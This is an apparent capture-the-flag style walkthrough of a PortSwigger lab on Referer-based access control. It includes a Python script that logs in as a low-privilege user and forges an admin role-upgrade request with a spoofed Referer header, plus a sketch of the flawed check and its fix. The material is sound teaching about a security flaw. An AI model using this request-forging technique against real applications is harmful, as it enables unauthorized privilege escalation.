🕵‍♂️Info:

This lab controls access to certain admin functionality based on the Referer header. You can familiarize yourself with the admin panel by logging in using the credentials administrator:admin.

🎯Goal:

To solve the lab, log in using the credentials wiener:peter and exploit the flawed access controls to promote yourself to become an administrator.


This lab is easy. First log in as administrator (administrator:admin) and upgrade carlos from the admin panel, so that a genuine admin request lands in Burp's HTTP history; then log out.

  1. Log in as wiener (wiener:peter)
  2. Go to Proxy → HTTP history and send the relevant requests to Repeater


Go to the request GET /my-account?id=wiener and copy wiener's session cookie.

Do not change anything else in the admin request. The server decides whether a request to the admin endpoint is allowed purely by looking at the Referer header: if it points at the admin page the request goes through, and if it points anywhere else (or is missing) the request is blocked.

So after copying the session, go to the request GET /admin-roles?username=carlos&action=upgrade (the one the admin panel sent when you upgraded carlos).

Paste wiener's session cookie in place of the administrator's and change the username from carlos to wiener.

Notice that the Referer still points at the admin page, because this request was originally sent from the admin panel. That is the entire access check: the Referer is a header the client chooses, so you could just as well type it in by hand.


Send the request, click "Follow redirection", and wiener now has the admin panel. Congrats, you solved the lab 🎉
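The same steps scripted end to end, as an added example that is not part of the original writeup and not PortSwigger's code. It assumes the lab origin is passed in as LAB_URL, that the login form at /login posts `csrf`, `username` and `password` and sets a `session` cookie, and that the admin endpoint is GET /admin-roles?username=<user>&action=upgrade as seen in HTTP history. The two small authorize functions at the end are a reconstruction of the flawed check and its fix, not the lab's actual server code.

```python
import http.cookiejar
import re
import urllib.parse
import urllib.request

# Assumption: replace with your own lab instance URL (placeholder, not a real host).
LAB_URL = "https://EXAMPLE-LAB-ID.web-security-academy.net"


def build_upgrade_request(lab_url, session_cookie, username):
    """Forge the request the admin panel sends, but with a low-privilege session.
    The Referer is chosen by the client, so we simply claim we came from /admin."""
    query = urllib.parse.urlencode({"username": username, "action": "upgrade"})
    req = urllib.request.Request(f"{lab_url}/admin-roles?{query}", method="GET")
    req.add_header("Cookie", f"session={session_cookie}")
    req.add_header("Referer", f"{lab_url}/admin")
    return req


def login(opener, lab_url, username, password):
    """Log in through the normal form; the opener's cookie jar keeps the session cookie.
    Assumption: the form carries a hidden `csrf` field, as PortSwigger labs usually do."""
    page = opener.open(f"{lab_url}/login").read().decode()
    csrf = re.search(r'name="csrf"\s+value="([^"]+)"', page).group(1)
    body = urllib.parse.urlencode(
        {"csrf": csrf, "username": username, "password": password}
    ).encode()
    opener.open(f"{lab_url}/login", data=body)


def solve(lab_url, username="wiener", password="peter"):
    """Log in as wiener, then replay the admin request with wiener's own cookie
    and a Referer pointing at the admin page. Returns the final HTTP status."""
    jar = http.cookiejar.CookieJar()
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(jar))
    login(opener, lab_url, username, password)
    session = next(c.value for c in jar if c.name == "session")
    # urllib follows the 302 for us, which is the "Follow redirection" click in Burp.
    resp = urllib.request.urlopen(build_upgrade_request(lab_url, session, username))
    return resp.status


def referer_based_authorize(headers, lab_url):
    """Reconstruction of the flawed logic the lab models: trust the client-supplied
    Referer as proof that the request was issued from the admin page."""
    return headers.get("Referer", "").startswith(f"{lab_url}/admin")


def role_based_authorize(session_roles, session_cookie):
    """The fix: derive privilege from the server-side session, never from a header."""
    return session_roles.get(session_cookie) == "administrator"


if __name__ == "__main__":
    print(solve(LAB_URL))
```

Nothing in build_upgrade_request depends on having captured a real admin request first; the Referer value is typed in like any other header, which is exactly why a Referer check is not an access control.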
